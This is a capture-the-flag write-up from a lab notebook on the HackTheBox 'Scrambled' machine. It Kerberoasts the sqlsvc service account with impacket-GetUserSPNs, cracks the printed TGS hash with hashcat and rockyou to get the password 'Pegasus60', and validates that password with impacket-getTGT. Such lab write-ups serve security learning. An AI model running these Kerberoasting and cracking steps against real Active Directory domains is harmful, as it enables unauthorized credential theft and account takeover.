Kerberoasting

during the bloodhound enumeration, the sqlsvc account has been identified to be vulnerable to kerberoasting

kerberoasting is an attack where an adversary targets service tickets granted by the Key Distribution Center (KDC) in a Kerberos authentication system. The attacker requests service tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline, seeking to obtain plaintext credentials. This attack takes advantage of weak encryption used to protect service tickets, enabling the adversary to potentially compromise user accounts.

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetUserSPNs scrm.local/ksimpson@dc1.scrm.local -no-pass -k -dc-ip $IP -dc-host dc1.scrm.local -request-user sqlsvc
Impacket v0.11.0 - Copyright 2023 Fortra
 
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
mssqlsvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 17:32:02.351452  2023-11-20 09:43:04.998096             
mssqlsvc/dc1.scrm.local       sqlsvc            2021-11-03 17:32:02.351452  2023-11-20 09:43:04.998096             
 
 
 
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f241d37dcf397bd8f2b8b20c5ee4060e$3028d1d3ee2c7fd5363f9752302743d87a75f3f2009630743c298d7a67bf315decaafeb74ee08322c697f8f954d5f2a3b9a8b74e67ed78854b6ae4f435c36c5c7c2294d2b8c686883e1ad9b836c2de80863d3fb74341458b14f90acc6a8b17a1a5c8eee74d3dc4ce8be27c22be14f68055f832e416f357ace74bc7cd061a0b9ee9dacbfe046583762346cf2a632352253a2ce26bbbb74590f4318815d81117e6a03348bb036d557e9f26da54bf8ea853696990b7acddafe43e0f7ee0b4cfa9a53257a452c9f437c6e8040b32069a6a62001ae6057815d3b098e4a93615185550a75da6040f2e7e072bb00fc8c2301127baa704cd60c2f9b8b4138d75eceec7287a5dcd92ba139306e4018aaed95ebc54e7e6c8d0be627c14c1cd66ea68f957ed2d7ad3fd29fffe841b6ee28d1a2329f88798f8c694b61b6f4f80b5567db7ef662118aba9bc1a38434b7ad60b604066dfb686ee092a2bc057c309bca865e49683471f6b9c0b0ed1ca023890bd801e0567a08f8feb466231622f43ca98cc8f4000e38c5a0f30e6be6e521b0087657655e2d2fd002cc165b51637bb3cff8023b9a8a63b2b36079bcdc05edd2eabf3fec6567dff3ec0e0ee143b68cb7a76a7c3de28c25bd710bc76eb9d2a5f75ae7f9c17de3d24dbb9cad2313588a643701421ca5e7799b98d6d522d46c028b5464e79f1aea8d8f6a65f4041611ca9bb009bc373efff75ce49c98b0a54173d83631cbaece9cc2ea92b65ccef29e2f15a51cfbc9ce2468b7703f3ac1b67a4719facade46a65da793075d9c5abba218e4d8dcbdfc6760ef2d99d43dca37a8319df932cdd77b63662984403772c65ddcb70f337a63cb06ea1e030dd3d2931ee98ce3d4f2e955e4553cd241bfa31a5762b682f59962c00134828d43522ec0a31089a7f50fb89755d110e9954f890d2e834843e40abd1deec8407670cb9617b9dafc802b427b664dde7c9db2c18caccbf92f72fcf949a92c295912f1d1fc31ebcfe283b1f98cab9a674f032373db2e0bebe683b5c215d22e32f242176ee5a1d9aa883bb05e77514d8f47892168a335d6cb6e9def1d3d5e770c6b0be86bf912b22cf3f5c59a5bb200f0a1f49fb537219c561ce53bb19bbd660c7e8a49d078535d65b9e88f0131547db8ffcede3b0ba1a0ac3328504a12ceb6dfe6ebfa2db1ccc53a20e667e842ee3c0ab5e9616844a453a1d8044edcc2a5f7c7946288e9315e9dd9aa52cb604f60a925510c8756fd663e0d3cb76dfdac6f5e58789570824b7c9a799c04f5cfdf26b47ff0fa1bf56c93a8013189b0e14f45e892a91ce2d45eb221a2722d962ec59814bc7edec6bc75d825853a98904d78335089aa239952bda7d7296b906066de8c39713114c1a6a5348b343820a27401ad0ea0bbdb10c1b73ec71ff15e8c4491de3cdd62d4b91b0580309099e

Using the TGT of the ksimpson user, I am able to authenticate to the target KDC to Kerberoast the sqlsvc account, effectively extracting the TGS hash The SPNs matches

mssqlsvc/dc1.scrm.local:1433
MSSQLSvc/dc1.scrm.local

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ hashcat --show sqlsvc.hash
 
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ hashcat -a 0 -m 13100 sqlsvc.hash /usr/share/wordlists/rockyou.txt  
hashcat (v6.2.6) starting
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f241d37dcf397bd8f2b8b20c5ee4060e$3028d1d3ee2c7fd5363f9752302743d87a75f3f2009630743c298d7a67bf315decaafeb74ee08322c697f8f954d5f2a3b9a8b74e67ed78854b6ae4f435c36c5c7c2294d2b8c686883e1ad9b836c2de80863d3fb74341458b14f90acc6a8b17a1a5c8eee74d3dc4ce8be27c22be14f68055f832e416f357ace74bc7cd061a0b9ee9dacbfe046583762346cf2a632352253a2ce26bbbb74590f4318815d81117e6a03348bb036d557e9f26da54bf8ea853696990b7acddafe43e0f7ee0b4cfa9a53257a452c9f437c6e8040b32069a6a62001ae6057815d3b098e4a93615185550a75da6040f2e7e072bb00fc8c2301127baa704cd60c2f9b8b4138d75eceec7287a5dcd92ba139306e4018aaed95ebc54e7e6c8d0be627c14c1cd66ea68f957ed2d7ad3fd29fffe841b6ee28d1a2329f88798f8c694b61b6f4f80b5567db7ef662118aba9bc1a38434b7ad60b604066dfb686ee092a2bc057c309bca865e49683471f6b9c0b0ed1ca023890bd801e0567a08f8feb466231622f43ca98cc8f4000e38c5a0f30e6be6e521b0087657655e2d2fd002cc165b51637bb3cff8023b9a8a63b2b36079bcdc05edd2eabf3fec6567dff3ec0e0ee143b68cb7a76a7c3de28c25bd710bc76eb9d2a5f75ae7f9c17de3d24dbb9cad2313588a643701421ca5e7799b98d6d522d46c028b5464e79f1aea8d8f6a65f4041611ca9bb009bc373efff75ce49c98b0a54173d83631cbaece9cc2ea92b65ccef29e2f15a51cfbc9ce2468b7703f3ac1b67a4719facade46a65da793075d9c5abba218e4d8dcbdfc6760ef2d99d43dca37a8319df932cdd77b63662984403772c65ddcb70f337a63cb06ea1e030dd3d2931ee98ce3d4f2e955e4553cd241bfa31a5762b682f59962c00134828d43522ec0a31089a7f50fb89755d110e9954f890d2e834843e40abd1deec8407670cb9617b9dafc802b427b664dde7c9db2c18caccbf92f72fcf949a92c295912f1d1fc31ebcfe283b1f98cab9a674f032373db2e0bebe683b5c215d22e32f242176ee5a1d9aa883bb05e77514d8f47892168a335d6cb6e9def1d3d5e770c6b0be86bf912b22cf3f5c59a5bb200f0a1f49fb537219c561ce53bb19bbd660c7e8a49d078535d65b9e88f0131547db8ffcede3b0ba1a0ac3328504a12ceb6dfe6ebfa2db1ccc53a20e667e842ee3c0ab5e9616844a453a1d8044edcc2a5f7c7946288e9315e9dd9aa52cb604f60a925510c8756fd663e0d3cb76dfdac6f5e58789570824b7c9a799c04f5cfdf26b47ff0fa1bf56c93a8013189b0e14f45e892a91ce2d45eb221a2722d962ec59814bc7edec6bc75d825853a98904d78335089aa239952bda7d7296b906066de8c39713114c1a6a5348b343820a27401ad0ea0bbdb10c1b73ec71ff15e8c4491de3cdd62d4b91b0580309099e:Pegasus60
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f...09099e
Time.Started.....: Mon Nov 20 09:52:33 2023 (6 secs)
Time.Estimated...: Mon Nov 20 09:52:39 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2000.7 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10730496/14344386 (74.81%)
Rejected.........: 0/10730496 (0.00%)
Restore.Point....: 10727424/14344386 (74.78%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Petey7840 -> Paulisdead
Hardware.Mon.#1..: Util: 62%
 
Started: Mon Nov 20 09:52:33 2023
Stopped: Mon Nov 20 09:52:40 2023

hashcat cracked the TGS ticket The cracked password is Pegasus60

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ impacket-getTGT scrm.local/sqlsvc@dc1.scrm.local -k -dc-ip $IP  
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: Pegasus60
[*] Saving ticket in sqlsvc@dc1.scrm.local.ccache

Validated TGT generated for the sqlsvc account

InfoSec LAB

Explorer

Scrambled_Kerberoasting

Kerberoasting

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks